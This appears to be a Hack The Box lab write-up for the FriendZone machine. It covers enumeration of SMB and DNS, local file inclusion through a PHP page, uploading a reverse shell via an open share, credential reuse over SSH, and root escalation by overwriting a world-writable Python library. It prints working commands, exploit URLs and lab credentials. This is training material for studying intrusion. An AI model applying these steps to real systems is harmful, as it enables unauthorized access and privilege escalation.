HTB FriendZone (10.10.10.123) MACHINE WRITE-UP

PART 1 : INITIAL RECON
PART 2 : PORT ENUMERATION
PART 3 : GENERATE USER SHELL
PART 4 : PRIVILEGE ESCALATION (friend -> root)

PART 1 : INITIAL RECON

nmap --min-rate 1000 -p- -v 10.10.10.123

PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds

nmap -oN friendzone -p21,22,53,80,139,445 -sC -sV -v 10.10.10.123

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: FRIENDZONE; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s
| nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   FRIENDZONE<00>       Flags: <unique><active>
|   FRIENDZONE<03>       Flags: <unique><active>
|   FRIENDZONE<20>       Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2019-04-16T08:46:11+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-04-16 13:46:11
|_  start_date: N/A

NOTE(S):

There is an FTP, SSH, DNS, HTTP, HTTPS, and SMB service available
The FTP service does not allow anonymous logins

PART 2 : Port Enumeration

Explore SMB service

Enumeration

enum4linux -a 10.10.10.123

...

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.123    |
 ====================================================
[+] Got domain/workgroup name: WORKGROUP

...

 =====================================
|    Session Check on 10.10.10.123    |
 =====================================
[+] Server 10.10.10.123 allows sessions using username '', password ''

...

 =========================================
|    Share Enumeration on 10.10.10.123    |
 =========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Files           Disk      FriendZone Samba Server Files /etc/Files
        general         Disk      FriendZone Samba Server Files
        Development     Disk      FriendZone Samba Server Files
        IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            FRIENDZONE

[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$           Mapping: DENIED, Listing: N/A
//10.10.10.123/Files            Mapping: DENIED, Listing: N/A
//10.10.10.123/general          Mapping: OK, Listing: OK
//10.10.10.123/Development      Mapping: OK, Listing: OK
//10.10.10.123/IPC$             [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

...

NOTE(S):

Workgroup name is WORKGROUP
/etc/Files was listed as comment for Files share
general and Development shares does not require authentication

Explore available shares

//10.10.10.123/general

smbclient \\\\WORKGROUP\\general -I 10.10.10.123 -N

While inside the client:

dir     
# creds.txt      N     57  Wed Oct 10 07:52:42 2018
           
get creds.txt

creds.txt contents:

creds for the admin THING:

admin:WORKWORKHhallelujah@#

//10.10.10.123/Development

smbclient \\\\WORKGROUP\\Development -I 10.10.10.123 -N

While inside the client:

dir
# .              D      0  Thu Jan 17 04:03:49 2019
# ..             D      0  Thu Jan 24 05:51:02 2019

NOTE(S):

general share contains admin credentials
Development share is empty

Visit http://10.10.10.123

Page Source:

<title>Friend Zone Escape software</title>

<center><h2>Have you ever been friendzoned ?</h2></center>

<center><img src="fz.jpg"></center>

<center><h2>if yes, try to get out of this zone ;)</h2></center>

<center><h2>Call us at : +999999999</h2></center>

<center><h2>Email us at: info@friendzoneportal.red</h2></center>

NOTE(S):

friendzoneportal.red is a domain name

Do a DNS lookup for friendzoneportal.red with zone transfer

Enumeration:

dig @10.10.10.123 friendzoneportal.red axfr
      
# friendzoneportal.red.         604800  IN     SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
# friendzoneportal.red.         604800  IN     AAAA    ::1
# friendzoneportal.red.         604800  IN     NS      localhost.
# friendzoneportal.red.         604800  IN     A       127.0.0.1
# admin.friendzoneportal.red.   604800  IN     A       127.0.0.1
# files.friendzoneportal.red.   604800  IN     A       127.0.0.1
# imports.friendzoneportal.red. 604800  IN     A       127.0.0.1
# vpn.friendzoneportal.red.     604800  IN     A       127.0.0.1
# friendzoneportal.red.         604800  IN     SOA     localhost. root.localhost. 2 604800 86400 2419200 604800

Add subdomains to /etc/hosts

127.0.0.1       localhost
127.0.1.1       kali f
10.10.10.123    friendzoneportal.red
10.10.10.123    admin.friendzoneportal.red
10.10.10.123    files.friendzoneportal.red    \\\DEAD END
10.10.10.123    imports.friendzoneportal.red  \\\DEAD END
10.10.10.123    vpn.friendzoneportal.red      \\\DEAD END

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Visit http://admin.friendzoneportal.red
- Loads homepage of http://10.10.10.123

Visit http://10.10.10.123:443

HTTP Response

<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
Instead use the HTTPS scheme to access this URL, please.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 443</address>

Switch to https://10.10.10.123

Check SSL Certificate

openssl s_client -connect 10.10.10.123:443 -quiet

depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=18:self signed certificate
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=10:certificate has expired
notAfter=Nov  4 21:02:30 2018 GMT
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
notAfter=Nov  4 21:02:30 2018 GMT
verify return:1

HTTP/1.1 400 Bad Request
Date: Tue, 16 Apr 2019 08:57:42 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 443</address>
</body></html>

NOTE(S):

friendzone.red is another domain name
Try accessing subdomains over https

Visit https://admin.friendzoneportal.red

Page Source:

<title>Admin Page</title>

<center><h2>Login and break some friendzones !</h2></center>

<center><h2>Spread the love !</h2></center>

<center>
<form name="login" method="POST" action="login.php">

<p>Username : <input type="text" name="username"></p>
<p>Password : <input type="password" name="password"></p>
<p><input type="submit" value="Login"></p>

</form>
</center>

Response after successful logging using credentials from creds.txt
```
<h1>Admin page is not developed yet !!! check for another one</h1>
```
NOTE(S):
Maybe there is another admin page in friendzone.red

Do a DNS lookup for friendzone.red with zone transfer

Enumeration:

dig @10.10.10.123 friendzone.red axfr
    
# friendzone.red.                 604800  IN     SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
# friendzone.red.                 604800  IN     AAAA    ::1
# friendzone.red.                 604800  IN     NS      localhost.
# friendzone.red.                 604800  IN     A       127.0.0.1
# administrator1.friendzone.red.  604800  IN     A       127.0.0.1
# hr.friendzone.red.              604800  IN     A       127.0.0.1
# uploads.friendzone.red.         604800  IN     A       127.0.0.1
# friendzone.red.                 604800  IN     SOA     localhost. root.localhost. 2 604800 86400 2419200 604800

Add subdomains to /etc/hosts

127.0.0.1       localhost
127.0.1.1       kali f
10.10.10.123    friendzone.red
10.10.10.123    administrator1.friendzone.red
10.10.10.123    hr.friendzone.red             \\\DEAD END
10.10.10.123    uploads.friendzone.red        

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Visit https://administrator1.friendzone.red

Snippet from Page Source:

<form method="POST" action="login.php" name="Login" class="login-form">
  <input type="text" name="username" placeholder="username"/>
  <input type="password" name="password" placeholder="password"/>
  <button>login</button>
</form>

Response after successful logging using credentials from creds.txt
```
Login Done ! visit /dashboard.php
```

Go to https://administrator1.friendzone.red/dashboard.php

Page Source:

<title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>        
<br><br>
<center><p>image_name param is missed !</p></center>
<center><p>please enter it to show the image</p></center>
<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>

/dashboard.php?image_id=a.jpg&pagename=timestamp

<title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>  
<center>
  <img src='images/a.jpg'></center><center>
  <h1>Something went worng ! , the script include wrong param !</h1>
</center>
Final Access timestamp is 1555410914

NOTE(S):

The image_id parameter is loaded from a directory images/
The pagename parameter might be exploitable

PART 3 : GENERATE USER SHELL

Exploit pagename parameter from https://administrator1.friendzone.red/dashboard.php

Attempt LFI using php://filter

/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=timestamp

Page Source:

<title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>
<center><img src='images/a.jpg'></center>
<center><h1>Something went worng ! , the script include wrong param !</h1></center>
PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo=

Decoding the base64 output:

echo PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo= | base64 --decode

The source code for timestamp.php appears:

<?php


$time_final = time() + 3600;

echo "Final Access timestamp is $time_final";


?>

Now try reading other files (e.g. dashboard.php)

/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard

Page Source:

<title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>
<center><img src='images/a.jpg'></center>
<center><h1>Something went worng ! , the script include wrong param !</h1></center>
PD9waHAKCi8vZWNobyAiPGNlbnRlcj48aDI+U21hcnQgcGhvdG8gc2NyaXB0IGZvciBmcmllbmR6b25lIGNvcnAgITwvaDI+PC9jZW50ZXI+IjsKLy9lY2hvICI8Y2VudGVyPjxoMz4qIE5vdGUgOiB3ZSBhcmUgZGVhbGluZyB3aXRoIGEgYmVnaW5uZXIgcGhwIGRldmVsb3BlciBhbmQgdGhlIGFwcGxpY2F0aW9uIGlzIG5vdCB0ZXN0ZWQgeWV0ICE8L2gzPjwvY2VudGVyPiI7CmVjaG8gIjx0aXRsZT5GcmllbmRab25lIEFkbWluICE8L3RpdGxlPiI7CiRhdXRoID0gJF9DT09LSUVbIkZyaWVuZFpvbmVBdXRoIl07CgppZiAoJGF1dGggPT09ICJlNzc0OWQwZjRiNGRhNWQwM2U2ZTkxOTZmZDFkMThmMSIpewogZWNobyAiPGJyPjxicj48YnI+IjsKCmVjaG8gIjxjZW50ZXI+PGgyPlNtYXJ0IHBob3RvIHNjcmlwdCBmb3IgZnJpZW5kem9uZSBjb3JwICE8L2gyPjwvY2VudGVyPiI7CmVjaG8gIjxjZW50ZXI+PGgzPiogTm90ZSA6IHdlIGFyZSBkZWFsaW5nIHdpdGggYSBiZWdpbm5lciBwaHAgZGV2ZWxvcGVyIGFuZCB0aGUgYXBwbGljYXRpb24gaXMgbm90IHRlc3RlZCB5ZXQgITwvaDM+PC9jZW50ZXI+IjsKCmlmKCFpc3NldCgkX0dFVFsiaW1hZ2VfaWQiXSkpewogIGVjaG8gIjxicj48YnI+IjsKICBlY2hvICI8Y2VudGVyPjxwPmltYWdlX25hbWUgcGFyYW0gaXMgbWlzc2VkICE8L3A+PC9jZW50ZXI+IjsKICBlY2hvICI8Y2VudGVyPjxwPnBsZWFzZSBlbnRlciBpdCB0byBzaG93IHRoZSBpbWFnZTwvcD48L2NlbnRlcj4iOwogIGVjaG8gIjxjZW50ZXI+PHA+ZGVmYXVsdCBpcyBpbWFnZV9pZD1hLmpwZyZwYWdlbmFtZT10aW1lc3RhbXA8L3A+PC9jZW50ZXI+IjsKIH1lbHNlewogJGltYWdlID0gJF9HRVRbImltYWdlX2lkIl07CiBlY2hvICI8Y2VudGVyPjxpbWcgc3JjPSdpbWFnZXMvJGltYWdlJz48L2NlbnRlcj4iOwoKIGVjaG8gIjxjZW50ZXI+PGgxPlNvbWV0aGluZyB3ZW50IHdvcm5nICEgLCB0aGUgc2NyaXB0IGluY2x1ZGUgd3JvbmcgcGFyYW0gITwvaDE+PC9jZW50ZXI+IjsKIGluY2x1ZGUoJF9HRVRbInBhZ2VuYW1lIl0uIi5waHAiKTsKIC8vZWNobyAkX0dFVFsicGFnZW5hbWUiXTsKIH0KfWVsc2V7CmVjaG8gIjxjZW50ZXI+PHA+WW91IGNhbid0IHNlZSB0aGUgY29udGVudCAhICwgcGxlYXNlIGxvZ2luICE8L2NlbnRlcj48L3A+IjsKfQo/Pgo=

Decoding the base64 output:

echo PD9waHAKCi8vZWNobyAiPGNlbnRlcj48aDI+U21hcnQgcGhvdG8gc2NyaXB0IGZvciBmcmllbmR6b25lIGNvcnAgITwvaDI+PC9jZW50ZXI+IjsKLy9lY2hvICI8Y2VudGVyPjxoMz4qIE5vdGUgOiB3ZSBhcmUgZGVhbGluZyB3aXRoIGEgYmVnaW5uZXIgcGhwIGRldmVsb3BlciBhbmQgdGhlIGFwcGxpY2F0aW9uIGlzIG5vdCB0ZXN0ZWQgeWV0ICE8L2gzPjwvY2VudGVyPiI7CmVjaG8gIjx0aXRsZT5GcmllbmRab25lIEFkbWluICE8L3RpdGxlPiI7CiRhdXRoID0gJF9DT09LSUVbIkZyaWVuZFpvbmVBdXRoIl07CgppZiAoJGF1dGggPT09ICJlNzc0OWQwZjRiNGRhNWQwM2U2ZTkxOTZmZDFkMThmMSIpewogZWNobyAiPGJyPjxicj48YnI+IjsKCmVjaG8gIjxjZW50ZXI+PGgyPlNtYXJ0IHBob3RvIHNjcmlwdCBmb3IgZnJpZW5kem9uZSBjb3JwICE8L2gyPjwvY2VudGVyPiI7CmVjaG8gIjxjZW50ZXI+PGgzPiogTm90ZSA6IHdlIGFyZSBkZWFsaW5nIHdpdGggYSBiZWdpbm5lciBwaHAgZGV2ZWxvcGVyIGFuZCB0aGUgYXBwbGljYXRpb24gaXMgbm90IHRlc3RlZCB5ZXQgITwvaDM+PC9jZW50ZXI+IjsKCmlmKCFpc3NldCgkX0dFVFsiaW1hZ2VfaWQiXSkpewogIGVjaG8gIjxicj48YnI+IjsKICBlY2hvICI8Y2VudGVyPjxwPmltYWdlX25hbWUgcGFyYW0gaXMgbWlzc2VkICE8L3A+PC9jZW50ZXI+IjsKICBlY2hvICI8Y2VudGVyPjxwPnBsZWFzZSBlbnRlciBpdCB0byBzaG93IHRoZSBpbWFnZTwvcD48L2NlbnRlcj4iOwogIGVjaG8gIjxjZW50ZXI+PHA+ZGVmYXVsdCBpcyBpbWFnZV9pZD1hLmpwZyZwYWdlbmFtZT10aW1lc3RhbXA8L3A+PC9jZW50ZXI+IjsKIH1lbHNlewogJGltYWdlID0gJF9HRVRbImltYWdlX2lkIl07CiBlY2hvICI8Y2VudGVyPjxpbWcgc3JjPSdpbWFnZXMvJGltYWdlJz48L2NlbnRlcj4iOwoKIGVjaG8gIjxjZW50ZXI+PGgxPlNvbWV0aGluZyB3ZW50IHdvcm5nICEgLCB0aGUgc2NyaXB0IGluY2x1ZGUgd3JvbmcgcGFyYW0gITwvaDE+PC9jZW50ZXI+IjsKIGluY2x1ZGUoJF9HRVRbInBhZ2VuYW1lIl0uIi5waHAiKTsKIC8vZWNobyAkX0dFVFsicGFnZW5hbWUiXTsKIH0KfWVsc2V7CmVjaG8gIjxjZW50ZXI+PHA+WW91IGNhbid0IHNlZSB0aGUgY29udGVudCAhICwgcGxlYXNlIGxvZ2luICE8L2NlbnRlcj48L3A+IjsKfQo/Pgo= | base64 --decode

The source code for dashboard.php appears:

<?php

//echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
//echo "<center><h3>* Note : we are dealing with a beginner php developer andthe application is not tested yet !</h3></center>";
echo "<title>FriendZone Admin !</title>";
$auth = $_COOKIE["FriendZoneAuth"];

if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
  echo "<br><br><br>";

  echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
  echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";

  if(!isset($_GET["image_id"])){
    echo "<br><br>";
    echo "<center><p>image_name param is missed !</p></center>";
    echo "<center><p>please enter it to show the image</p></center>";
    echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
  } else {
    $image = $_GET["image_id"];
    echo "<center><img src='images/$image'></center>";

    echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
    include($_GET["pagename"].".php");
    //echo $_GET["pagename"];
  }
} else {
  echo "<center><p>You can't see the content ! , please login !</center></p>";
}
?>

NOTE(S):

dashboard.php gets the filename of PHP files and then adds the extension .php
dashboard.php runs the file from the pagename parameter
Upload a malicious PHP file and access it using dashboard.php

Explore https://uploads.friendzone.red

Page Source:

<title>FriendZone Escape software upload manager</title>

<body>
<center><h2>Want to upload Stuff ??</h2></center>

<form action="upload.php" method="post" enctype="multipart/form-data">
    Select an image to upload (only images):
    <input type="file" name="imageu" id="file">
    <input type="hidden" name="image">
    <input type="submit" value="Upload" name="Upload">
</form>

</body>

Test if it accepts non-image files
- Create payload (test.php)
```
echo "<?php echo \"hello world\"; ?>" > test.php
```
- Response after uploading test.php
```
Uploaded successfully !<br>1555476301
```
NOTE(S):
- It accepts non-image files
- The directory of the uploaded files is still unknown

Find the uploaded files

gobuster -k -u https://uploads.friendzone.red/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt 
# /files (Status: 301)
     
gobuster -k -u https://uploads.friendzone.red/files -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt
# /note (Status: 200)

Visiting https://uploads.friendzone.red/files/note

under development !

NOTE(S):

Perhaps “under development” points to the Development share from earlier

Check if test.php was really successfully uploaded

Reopen Development share:

smbclient \\\\WORKGROUP\\Development -I 10.10.10.123 -N

While inside the client:

dir
# .              D      0  Thu Jan 17 04:03:49 2019
# ..             D      0  Thu Jan 24 05:51:02 2019

NOTE(S):

The Development share is still empty

Try to read the source code of upload.php

/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=../uploads/upload

Page Source:

<title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>
<center><img src='images/a.jpg'></center>
<center><h1>Something went worng ! , the script include wrong param !</h1></center>
PD9waHAKCi8vIG5vdCBmaW5pc2hlZCB5ZXQgLS0gZnJpZW5kem9uZSBhZG1pbiAhCgppZihpc3NldCgkX1BPU1RbImltYWdlIl0pKXsKCmVjaG8gIlVwbG9hZGVkIHN1Y2Nlc3NmdWxseSAhPGJyPiI7CmVjaG8gdGltZSgpKzM2MDA7Cn1lbHNlewoKZWNobyAiV0hBVCBBUkUgWU9VIFRSWUlORyBUTyBETyBIT09PT09PTUFOICEiOwoKfQoKPz4K

Decoding the base64 output:

echo PD9waHAKCi8vIG5vdCBmaW5pc2hlZCB5ZXQgLS0gZnJpZW5kem9uZSBhZG1pbiAhCgppZihpc3NldCgkX1BPU1RbImltYWdlIl0pKXsKCmVjaG8gIlVwbG9hZGVkIHN1Y2Nlc3NmdWxseSAhPGJyPiI7CmVjaG8gdGltZSgpKzM2MDA7Cn1lbHNlewoKZWNobyAiV0hBVCBBUkUgWU9VIFRSWUlORyBUTyBETyBIT09PT09PTUFOICEiOwoKfQoKPz4K | base64 --decode

The source code for ../uploads/upload.php appears:

<?php

// not finished yet -- friendzone admin !

if(isset($_POST["image"])){

echo "Uploaded successfully !<br>";
echo time()+3600;
}else{

echo "WHAT ARE YOU TRYING TO DO HOOOOOOMAN !";

}

?>

NOTE(S):

The uploaded file is not saved anywhere…
https://uploads.friendzone.red is actually a dead end

Linking the Development share and dashboard.php

Upload test.php directly to the Development share
```
smbclient \\\\WORKGROUP\\Development -c "put test.php test.php" -I 10.10.10.123 -N   
# putting file test.php as \test.php (0.0 kb/s) (average 0.0 kb/s)
```
NOTE(S):
- /etc/Files was commented for the Files share during share enumeration in enum4linux
- Maybe files in the Development share are saved in /etc/Development

Attempt LFI at the /etc/Development directory using dashboard.php

/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test

Page Source:

<title>FriendZone Admin !</title>
<br><br><br>
<center><h2>Smart photo script for friendzone corp !</h2></center>
<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>
<center><img src='images/a.jpg'></center>
<center><h1>Something went worng ! , the script include wrong param !</h1></center>
hello world

NOTE(S):

The files in the Development share are indeed saved in /etc/Development

Upload PHP reverse shell

Download shell from pentestmonkey
Update values of $ip and $port

Upload to the Development share

smbclient \\\\WORKGROUP\\Development -c "put shell.php shell.php" -I 10.10.10.123 -N
# putting file shell.php as \shell.php (7.0 kb/s) (average 7.0 kb/s)

Establish shell

Set-up local netcat listener:
```
nc -lvp 4444
```

Run shell using dashboard.php:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell

While inside the shell:

id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

cat /etc/passwd | grep bash
# root:x:0:0:root:/root:/bin/bash
# friend:x:1000:1000:friend,,,:/home/friend:/bin/bash

find /var/www -name *conf* 2>/dev/null
# /var/www/mysql_data.conf
     
cat /var/www/mysql_data.conf

/var/www/mysql_data.conf contents:

for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ

NOTE(S):

There exists a user named friend
There are credentials for friend in /var/www/mysql_data.conf

ssh -l friend 10.10.10.123
# friend@10.10.10.123's password: Agpyu12!0.213$

While inside shell:

find ~ -name user.txt
# /home/friend/user.txt
     
cat /home/friend/user.txt
# a9ed20acecd6c5b6b52f474e15ae9a11

PART 4 : Privilege Escalation (friend -> root)

Download and upload pspy

Check system architecture of FriendZone
```
uname -op
# x86_64 GNU/Linux
```
NOTE(S):
- The system runs on 64-bit

Upload pspy64 to FriendZone

Local terminal:

python -m SimpleHTTPServer
# Serving HTTP on 0.0.0.0 port 8000 ...

FriendZone terminal:

wget http://10.10.12.72:8000/pspy64
        
chmod +x pspy64

Run pspy64

./pspy64
# ...
# 54:01 CMD: UID=0    PID=7356   | /bin/sh -c /opt/server_admin/reporter.py 
# 54:01 CMD: UID=0    PID=7355   | /bin/sh -c /opt/server_admin/reporter.py 
# 54:01 CMD: UID=0    PID=7354   | /usr/sbin/CRON -f
# ...
# 56:01 CMD: UID=0    PID=7456   | /bin/sh -c /opt/server_admin/reporter.py 
# 56:01 CMD: UID=0    PID=7455   | /bin/sh -c /opt/server_admin/reporter.py 
# 56:01 CMD: UID=0    PID=7454   | /usr/sbin/CRON -f 
# ...
# 58:02 CMD: UID=0    PID=7540   | /bin/sh -c /opt/server_admin/reporter.py 
# 58:02 CMD: UID=0    PID=7539   | /bin/sh -c /opt/server_admin/reporter.py 
# 58:02 CMD: UID=0    PID=7538   | /usr/sbin/CRON -f
# ...

NOTE(S):

There is a script called reporter.py
It runs every two minutes

Check reporter.py

cat /opt/server_admin/reporter.py

#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

NOTE(S):

The script runs in python2.7
Maybe we can override the os library

Override the os library

Check the directory of reporter.py

ls -la /opt | grep server_admin
# drwxr-xr-x  2 root root 4096 Jan 24 00:57 server_admin

NOTE(S):

Non-root users cannot write to the directory

Check where os.py is saved

find / -name os.py 2>/dev/null
# /usr/lib/python3.6/os.py
# /usr/lib/python2.7/os.py
     
ls -la /usr/lib/python2.7/os.py
# -rwxrwxrwx 1 root root 25912 Apr 17 08:33 /usr/lib/python2.7/os.py

NOTE(S):

os.py could be overwritten by anyone

Overwrite os.py

echo "infile = open(\"/root/root.txt\", \"r\").read()" > /usr/lib/python2.7/os.py
echo "outfile = open(\"/tmp/root.txt\", \"w\").write(infile)" >> /usr/lib/python2.7/os.py
echo "outfile.close()" >> /usr/lib/python2.7/os.py

After reporter.py runs again:

cat /tmp/root.txt
# b0e6c60b82cf96e9855ac1656a9e90c7

[SITE PAGES]

[HTB BOXES]

jebidiah-anthony

write-ups and what not

HTB FriendZone (10.10.10.123) MACHINE WRITE-UP

TABLE OF CONTENTS

PART 1 : INITIAL RECON

PART 2 : Port Enumeration

PART 3 : GENERATE USER SHELL

PART 4 : Privilege Escalation (friend -> root)